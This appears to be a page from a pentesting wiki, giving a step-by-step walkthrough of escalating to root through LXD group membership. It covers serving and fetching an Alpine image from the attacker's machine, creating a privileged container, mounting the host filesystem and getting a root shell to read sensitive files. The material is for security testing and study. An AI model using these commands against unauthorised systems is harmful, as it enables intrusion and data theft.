Privilege Escalation

Ansible Playbook Privilege Escalation

Apache Conf Privilege Escalation

Bash eq Privilege Escalation

Buffer Overflow Privilege Escalation

Chrome Remote Debugger Pentesting

Doas Privilege Escalation

FireFox Credentials Dumping

Ghidra Debug Mode RCE

Gnuplot Privilege Escalation

LXC/LXD (Linux Container/Daemon) Privilege Escalation

Linux Privilege Escalation

OpenSSL Privilege Escalation

Pip Download Code Execution

PolKit Privilege Escalation

Python Eval Code Execution

Python Jails Escape

Python Privilege Escalation

Python Yaml Privilege Escalation

Ruby Privilege Escalation

Rust Privilege Escalation

SSSD Privilege Escalation

Shared Library Hijacking

Snapd Privilege Escalation

Sudo ClamAV Privilege Escalation

Sudo Dstat Privilege Escalation

Sudo Exiftool Privilege Escalation

Sudo Fail2ban Privilege Escalation

Sudo Git Privilege Escalation

Sudo Java Privilege Escalation

Sudo OpenVPN Privilege Escalation

Sudo Path Traversal Privilege Escalation

Sudo Privilege Escalation

Sudo Privilege Escalation by Overriding Shared Library

Sudo Reboot Privilege Escalation

Sudo Screen Privilege Escalation

Sudo Service Privilege Escalation

Sudo Shutdown, Poweroff Privilege Escalation

Sudo Systemctl Privilege Escalation

Sudo Tee Privilege Escalation

Sudo Umount Privilege Escalation

Sudo Vim Privilege Escalation

Sudo Wall Privilege Escalation

Sudo Wget Privilege Escalation

Sudoedit Privilege Escalation

Tar Wildcard Injection PrivEsc

Update-Motd Privilege Escalation

irb (Interactive Ruby Shell) Privilege Escalation

Post Exploitation

Cover Your Tracks in Linux

Linux Backdoors

Linux Pivoting

Backup

BorgBackup Pentesting

Container

LXC/LXD (Linux Container/Daemon) Privilege Escalation

LXC/LXD (Linux Container/Daemon) Privilege Escalation

Last modified: 2023-01-30

LXD is a container management extension for Linux Containers (LXC).

Basic Flow

1. Check if You are in the Lxd Group

If you belong to the Lxd group, you may be able to the root privileges.

groups
id

2. Check if Container Image Exists

List all images and check if a container image already exists.

lxc image list

If there are not container, build a new image in your local machine.

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine
python3 -m http.server 8000

In remote machine, download the “alpine-*.tar.gz” and import it.

wget http://<local-ip>:8000/alpine-v3.17-x86_64-20221206_0615.tar.gz
lxc image import ./alpine-v3.17-x86_64-20221206_0615.tar.gz --alias testimage
lxc image list

After that, create a new container from the image.

lxc init testimage testcontainer -c security.privileged=true

If you got the error “No storage pool found. Please create a new storage pool.”, initialize the lxd at first.

lxd init
# Set default values in prompt

Then create a new container as above command.

3. Mount the New Container to Root Directory

Now mount the host's / directory onto /mnt/root in the container you created.

lxc config device add testcontainer testdevice disk source=/ path=/mnt/root recursive=true

4. Start the Container

lxc start testcontainer

5. Get a Shell

lxc exec testcontainer /bin/sh

Check if you are root.

whoami

6. Retrieve the Sensitive Information in the Mounted Directory

cd /mnt/root/

Privilege Escalation

Post Exploitation

Backup

Container

Archive

Attack

Protocol

Management

LXC/LXD (Linux Container/Daemon) Privilege Escalation

Basic Flow

1. Check if You are in the Lxd Group

2. Check if Container Image Exists

3. Mount the New Container to Root Directory

4. Start the Container

5. Get a Shell

6. Retrieve the Sensitive Information in the Mounted Directory

ON THIS PAGE